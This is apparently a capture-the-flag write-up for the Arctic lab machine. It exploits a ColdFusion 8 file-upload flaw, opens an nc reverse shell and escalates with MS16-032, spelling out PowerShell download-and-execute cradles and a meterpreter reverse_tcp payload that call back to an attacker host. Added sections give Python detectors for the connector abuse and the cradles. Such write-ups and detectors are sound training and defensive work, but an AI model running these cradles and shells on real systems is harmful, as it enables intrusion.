Arctic

Arctic 10.10.10.11

Target Enumeration:

OS: Windows 2008

IP: 10.10.10.11

User: 02650d3a69a70780c302e146a6cb96f3

Root: ce65ceee66b2b5ebaff07e50508ffb90

Ports / Services / Software Versions Running

135/tcp   open  msrpc  Microsoft Windows RPC
8500/tcp  open  http   JRun Web Server
49154/tcp open  msrpc  Microsoft Windows RPC

Vulnerability Exploited:

ColdFusion 8.0.1 Arbitrary File Upload and Execute

This module exploits the Adobe ColdFusion 8.0.1 FCKeditor 'CurrentFolder' File Upload and Execute vulnerability.

https://www.rapid7.com/db/modules/exploit/windows/http/coldfusion_fckeditor
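From the defender's side, the useful question is whether anyone is reaching the FCKeditor connector at all on a ColdFusion 8 host, since that connector is what the upload-and-execute module targets and it has no business being exposed. The following is an added example, not part of the original writeup or of the Rapid7 module: a small Python scanner over web-server access logs that flags requests to the FCKeditor file-manager connector and reports the client, the `Command` and the `CurrentFolder` value. The connector path under /CFIDE/ is assumed from the module description; the log lines are constructed samples in Combined Log Format, not traffic captured from the box.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Combined Log Format); not real traffic from Arctic.
SAMPLE_LOG = """\
10.10.14.2 - - [12/Mar/2018:10:01:02 +0000] "GET /CFIDE/administrator/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.10.14.2 - - [12/Mar/2018:10:02:10 +0000] "POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/ HTTP/1.1" 200 312 "-" "Mozilla/5.0"
10.10.14.9 - - [12/Mar/2018:10:03:45 +0000] "GET /index.cfm HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request target and status from a Combined Log Format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Any request that reaches the FCKeditor file-manager connector is worth a look:
# the assumed ColdFusion 8 path is /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/...
CONNECTOR_RE = re.compile(r'/fckeditor/editor/filemanager/connectors/', re.IGNORECASE)


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_connector_request(target):
    """True if the request path points at the FCKeditor connector."""
    return bool(CONNECTOR_RE.search(urlsplit(target).path))


def find_connector_abuse(log_text):
    """Scan log text and return one record per request that hits the connector."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or not is_connector_request(rec["target"]):
            continue
        query = parse_qs(urlsplit(rec["target"]).query)
        hits.append({
            "ip": rec["ip"],
            "ts": rec["ts"],
            "method": rec["method"],
            "path": urlsplit(rec["target"]).path,
            "command": query.get("Command", [""])[0],
            "current_folder": query.get("CurrentFolder", [""])[0],
            "status": int(rec["status"]),
        })
    return hits


if __name__ == "__main__":
    for hit in find_connector_abuse(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} {hit["method"]} {hit["path"]} '
              f'Command={hit["command"]} CurrentFolder={hit["current_folder"]} status={hit["status"]}')
```

A 200 on the connector is the signal to act on: the mitigation is to remove or block the FCKeditor directory under /CFIDE/ (and the administrator interface) from anything but trusted addresses, so the scanner is only a backstop for hosts where that has not been done.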

Privilege Escalation:

MS16-032 Secondary Logon Handle Privilege Escalation

This module exploits the lack of sanitization of standard handles in Windows' Secondary Logon Service. The vulnerability is known to affect Windows 7 through 10 and Server 2008 through 2012, 32- and 64-bit. The module only works against those versions of Windows with PowerShell 2.0 or later and on systems with two or more CPU cores.

Replicating the exploit:

Nmap TCP

Webapp on port 8500

Dir search

The ColdFusion Administrator login page reveals version 8.

Searchsploit

Found the Metasploit version of the exploit.

Set options as follows

Start a Burp proxy listener on 127.0.0.1:8500 and check that the target still loads through it in the browser.

Capture the exploit's request in Burp.

Note the filename the upload is being written to.

Navigate to that file via the browser and set up your nc listener on port 4444

Like so

Gather system info etc

Grab the user file. Then copy Sherlock.ps1 to your current working directory, start your web server, and execute it on the target.

echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.2/Invoke-MS16032.ps1") | powershell -noprofile -

Did not work so try getting a meterpreter shell instead.

git clone https://github.com/trustedsec/unicorn.git

python unicorn.py windows/meterpreter/reverse_tcp 10.10.14.2 4445

msfconsole -r unicorn.rc

cat powershell_attack.txt > exploit.html

Open exploit.html in nano and delete the leading powershell wrapper up to and including the opening quote before "sv", and remove the matching quote at the end, so only the inner script remains.

Copy to your webserver

Run the following on Arctic:

powershell "iex(new-object net.webclient).downloadstring('http://10.10.14.2/exploit.html')"
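Both one-liners used on the box (the stdin-fed `powershell -noprofile -` cradle above and this `iex(...).downloadstring(...)` call) are classic PowerShell download cradles, and they are exactly what process-creation telemetry (Sysmon Event ID 1, 4688 with command-line auditing) is good at catching. The following is an added example, not from the original writeup: a Python scorer over constructed process-creation records that counts cradle indicators in each command line, extracts the remote URL being pulled, and flags records above a threshold. The sample records are constructed, with the two cradles from this writeup alongside two benign administrative commands; the field names are assumptions, not a real Sysmon schema.

```python
import re

# Constructed process-creation records (hypothetical field names); not real telemetry from Arctic.
SAMPLE_EVENTS = [
    {"pid": 1201, "image": "cmd.exe",
     "cmdline": 'cmd.exe /c echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.2/Invoke-MS16032.ps1") | powershell -noprofile -'},
    {"pid": 1340, "image": "powershell.exe",
     "cmdline": "powershell \"iex(new-object net.webclient).downloadstring('http://10.10.14.2/exploit.html')\""},
    {"pid": 1402, "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\nightly-backup.ps1"},
    {"pid": 1510, "image": "powershell.exe",
     "cmdline": "powershell.exe -Command Get-Process | Sort-Object CPU"},
]

# Each indicator is one building block of a download cradle; the score is how many are present.
INDICATORS = [
    ("invoke_expression", re.compile(r"\b(iex|invoke-expression)\b", re.IGNORECASE)),
    ("webclient", re.compile(r"new-object\s+(system\.)?net\.webclient", re.IGNORECASE)),
    ("download_call", re.compile(r"\.download(string|file|data)\s*\(", re.IGNORECASE)),
    ("remote_url", re.compile(r"https?://[^\s\"')]+", re.IGNORECASE)),
    # Script body piped in on stdin: "powershell -noprofile -" with nothing after the dash.
    ("stdin_script", re.compile(r"powershell(\.exe)?\s+[^|]*-noprofile\s+-\s*$", re.IGNORECASE)),
]

URL_RE = re.compile(r"https?://[^\s\"')]+", re.IGNORECASE)


def normalise(cmdline):
    """Collapse whitespace so spacing tricks do not split a token across a regex."""
    return re.sub(r"\s+", " ", cmdline).strip()


def score_command(cmdline):
    """Return the matched indicator names and their count for one command line."""
    cmd = normalise(cmdline)
    matched = [name for name, rx in INDICATORS if rx.search(cmd)]
    return {"score": len(matched), "indicators": matched}


def extract_urls(cmdline):
    """Return the remote URLs referenced by a command line, in order of appearance."""
    return URL_RE.findall(normalise(cmdline))


def flag_cradles(events, threshold=3):
    """Return the events whose cradle score reaches the threshold, with context for triage."""
    flagged = []
    for ev in events:
        result = score_command(ev["cmdline"])
        if result["score"] >= threshold:
            flagged.append({
                "pid": ev["pid"],
                "image": ev["image"],
                "score": result["score"],
                "indicators": result["indicators"],
                "urls": extract_urls(ev["cmdline"]),
            })
    return flagged


if __name__ == "__main__":
    for hit in flag_cradles(SAMPLE_EVENTS):
        print(f'pid={hit["pid"]} {hit["image"]} score={hit["score"]} '
              f'indicators={",".join(hit["indicators"])} urls={hit["urls"]}')
```

A threshold of three is deliberately loose: `iex` plus a WebClient plus a download call is enough to page someone, and the extracted URL gives the responder the host to block and the payload to pull for analysis. Script Block Logging (Event ID 4104) would additionally record the downloaded script body after it is evaluated, which is the artifact to collect once such a record is flagged.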

Check meterpreter

Run local exploit suggester (32 bit)

The shell is running as a 32-bit process, so go back to meterpreter and migrate to a 64-bit process.

Only one result comes back as 64-bit.

Set your options as follows:

Run the exploit to get a system shell.

Root.txt